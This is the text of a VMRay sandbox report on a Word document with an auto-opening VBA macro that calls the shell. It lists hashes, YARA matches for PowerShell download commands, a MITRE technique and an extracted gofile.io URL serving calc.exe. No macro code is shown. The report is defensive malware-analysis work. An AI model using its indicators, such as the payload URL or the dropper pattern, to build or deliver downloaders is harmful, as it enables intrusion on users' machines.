MALICIOUS Threat Names: VB.Heur2.Pwshell.2.2D752CDE.Gen

DYNAMIC ANALYSIS REPORT #1591761

Classifications: -

MALICIOUS Threat Names: VB.Heur2.PwShell.2.2D752CDE.Gen

Verdict Reason: -

Sample Type Word Document

Sample Name Test.doc

ID #590902

MD5 5d2ceee3e928463210ccbc8ee0b0e3e8

SHA1 701fd88acbd550d3f75f24a15ef6c3a5110bf859

SHA256 95fce78393454133357863709111d7e92f363d0016bd995259741c1fd1c60190

File Size 32.50 KB

Report Created 2021-06-04 23:05 (UTC+2)

Target Environment win10_64_th2_en_mso2016 | ms_office

X-Ray Vision for Malware - www.vmray.com 1 / 12 DYNAMIC ANALYSIS REPORT #1591761

OVERVIEW

VMRay Threat Identifiers (7 rules, 8 matches)

Score Category Operation Count Classification

4/5 Execution Document tries to create process 1 -

• Document unsuccessfully tries to create process "winword.exe".

4/5 Antivirus Malicious content was detected by heuristic scan 1 -

• Built-in AV detected the sample itself as "VB.Heur2.PwShell.2.2D752CDE.Gen".

4/5 YARA Malicious content matched by YARA rules 2 -

• Rule "PowerShell_Download_Commands" from ruleset "Generic" has matched on the sample itself.

• Rule "PowerShell_Download_Commands" from ruleset "Generic" has matched on the function strings for (process #1) winword.exe.

2/5 Execution Office macro uses an execute function 1 -

• Office macro uses the shell function.

2/5 Execution Executes macro on specific event 1 -

• Executes macro automatically on target "document" and event "open".

1/5 Execution Contains suspicious Office macro 1 -

• Office document contains a suspicious VBA macro.

1/5 Heuristics Contains suspicious meta data 1 -

• Office document contains below average content data.

X-Ray Vision for Malware - www.vmray.com 2 / 12 DYNAMIC ANALYSIS REPORT #1591761

Mitre ATT&CK Matrix

Command Initial Privilege Defense Credential Lateral Execution Persistence Discovery Collection and Exfiltration Impact Access Escalation Evasion Access Movement Control

#T1064 #T1064 ------Scripting Scripting

X-Ray Vision for Malware - www.vmray.com 3 / 12 DYNAMIC ANALYSIS REPORT #1591761

Sample Information

ID 1591761

MD5 5d2ceee3e928463210ccbc8ee0b0e3e8

SHA1 701fd88acbd550d3f75f24a15ef6c3a5110bf859

SHA256 95fce78393454133357863709111d7e92f363d0016bd995259741c1fd1c60190

SSDeep 384:wuE8iSwvxjk+ty1yxfsyog0jVAta/J1T3Ah:Xqxw+tjsACzT3A

ImpHash

Filename Test.doc

File Size 32.50 KB

Sample Type Word Document

Has Macros

Analysis Information

Creation Time 2021-06-04 23:05 (UTC+2)

Analysis Duration 00:04:10

Termination Reason Timeout

Number of Monitored Processes 1

Execution Successfull False

Reputation Analysis Enabled

WHOIS Enabled

Built-in AV Enabled

Built-in AV Applied On Sample Files, PCAP File, Downloaded Files, Dropped Files, Modified Files, Memory Dumps, Embedded Files

Number of AV Matches 1

YARA Enabled

YARA Applied On Sample Files, PCAP File, Downloaded Files, Dropped Files, Modified Files, Memory Dumps, Embedded Files

Number of YARA Matches 2

X-Ray Vision for Malware - www.vmray.com 4 / 12 DYNAMIC ANALYSIS REPORT #1591761

X-Ray Vision for Malware - www.vmray.com 5 / 12 DYNAMIC ANALYSIS REPORT #1591761

Screenshots trunkated.

X-Ray Vision for Malware - www.vmray.com 6 / 12 DYNAMIC ANALYSIS REPORT #1591761

NETWORK

General

0 bytes total sent

0 bytes total received

0 ports

0 contacted IP addresses

1 URLs extracted

0 files downloaded

0 malicious hosts detected

DNS

0 DNS requests for 0 domains

0 nameservers contacted

0 total requests returned errors

HTTP/S

0 URLs contacted, 0 servers

0 sessions, 0 bytes sent, 0 bytes recivied

DNS Requests

HTTP Requests

Method URL Dest. IP Dest. Port Status Code Response Size Verdict

https://srv- store2.gofile.io/ download/b8ce20ad- GET 0 bytes N/A dfc1-4aec- b020-65ab7ded29cb/ calc.exe

X-Ray Vision for Malware - www.vmray.com 7 / 12 DYNAMIC ANALYSIS REPORT #1591761

BEHAVIOR

Process Graph

#1 Sample Start winword.exe

X-Ray Vision for Malware - www.vmray.com 8 / 12 DYNAMIC ANALYSIS REPORT #1591761

Process #1: winword.exe

ID 1

Filename c:\program files (x86)\microsoft office\root\office16\winword.exe

Command Line "C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /n

Initial Working Directory C:\Users\RDhJ0CNFevzX\Desktop\

Monitor Start Time Start Time: 78654, Reason: Analysis Target

Unmonitor End Time End Time: 329328, Reason: Terminated by Timeout

Monitor Duration 250.67s

Return Code Unknown

PID 3472

Parent PID 2104

Bitness 32 Bit

Host Behavior

Type Count

Module 2

Keyboard 1

Process 1

Registry 4

- 2

X-Ray Vision for Malware - www.vmray.com 9 / 12 DYNAMIC ANALYSIS REPORT #1591761

ARTIFACTS

File

SHA256 Filenames Category Filesize MIME Type Operations Verdict

95fce783934541333578 C: 63709111d7e92f363d00 \Users\RDhJ0CNFevzX\ Sample File 32.50 KB application/msword MALICIOUS 16bd995259741c1fd1c6 Desktop\Test.doc 0190

Filename

Filename Category Operations Verdict

WINHELP.INI Accessed File Read, Access CLEAN

URL

URL Category IP Address Country HTTP Methods Verdict

https://srv-store2.gofile.io/ download/b8ce20ad- dfc1-4aec- GET CLEAN b020-65ab7ded29cb/ calc.exe

Domain

Domain IP Address Country Protocols Verdict

srv-store2.gofile.io HTTPS CLEAN

Email Address

Mutex

Registry

Registry Key Operations Parent Process Name Verdict

HKEY_LOCAL_MACHINE\Software\Microsoft access winword.exe CLEAN \Windows

HKEY_LOCAL_MACHINE\Software\Microsoft access winword.exe CLEAN \Windows\HTML Help

HKEY_LOCAL_MACHINE\Software\Microsoft access winword.exe CLEAN \Windows\Help

Process

Process Name Commandline Verdict

"C:\Program Files (x86)\Microsoft winword.exe CLEAN Office\Root\Office16\WINWORD.EXE" /n

X-Ray Vision for Malware - www.vmray.com 10 / 12 DYNAMIC ANALYSIS REPORT #1591761

YARA / AV

YARA (2)

Ruleset Name Rule Name Rule Description File Type Filename Classification Verdict

PowerShell may attempt C: PowerShell_Download_ to download external Generic Sample File \Users\RDhJ0CNFevzX\ 4/5 Commands content; possible Desktop\Test.doc dropper

PowerShell may attempt PowerShell_Download_ to download external function_strings_proces Generic Function Strings 4/5 Commands content; possible s_1.txt dropper

Antivirus (1)

File Type Threat Name Filename Verdict

SAMPLE VB.Heur2.PwShell.2.2D752CDE.Gen C:\Users\RDhJ0CNFevzX\Desktop\Test.doc MALICIOUS

X-Ray Vision for Malware - www.vmray.com 11 / 12 DYNAMIC ANALYSIS REPORT #1591761

ENVIRONMENT

Virtual Machine Information

Name win10_64_th2_en_mso2016

Description win10_64_th2_en_mso2016

Architecture x86 64-bit

Operating System Windows 10 Threshold 2

Kernel Version 10.0.10586.0 (0de6dc23-8e19-4bb7-8608-d54b1e6fa379)

Network Scheme Name Local Gateway

Network Config Name Local Gateway

Analyzer Information

Analyzer Version 4.1.1

Dynamic Engine Version 4.1.1 / 02/08/2021 15:19

Static Engine Version 1.6.0

Built-in AV Version AVCORE v2.2 Linux/x86_64 11.0.1.19 (November 12, 2020)

Built-in AV Database Update 2021-06-04 14:57:36+00:00 Release Date

VTI Ruleset Version 3.8

YARA Built-in Ruleset Version 1.5

Analysis Report Layout Version 10

Software Information

Adobe Acrobat Reader Version Not installed

Microsoft Office 2016

Microsoft Office Version 16.0.4266.1003

Internet Explorer Version 11.0.10586.0

Chrome Version Not installed

Firefox Version Not installed

Flash Version Not installed

Java Version Not installed

X-Ray Vision for Malware - www.vmray.com 12 / 12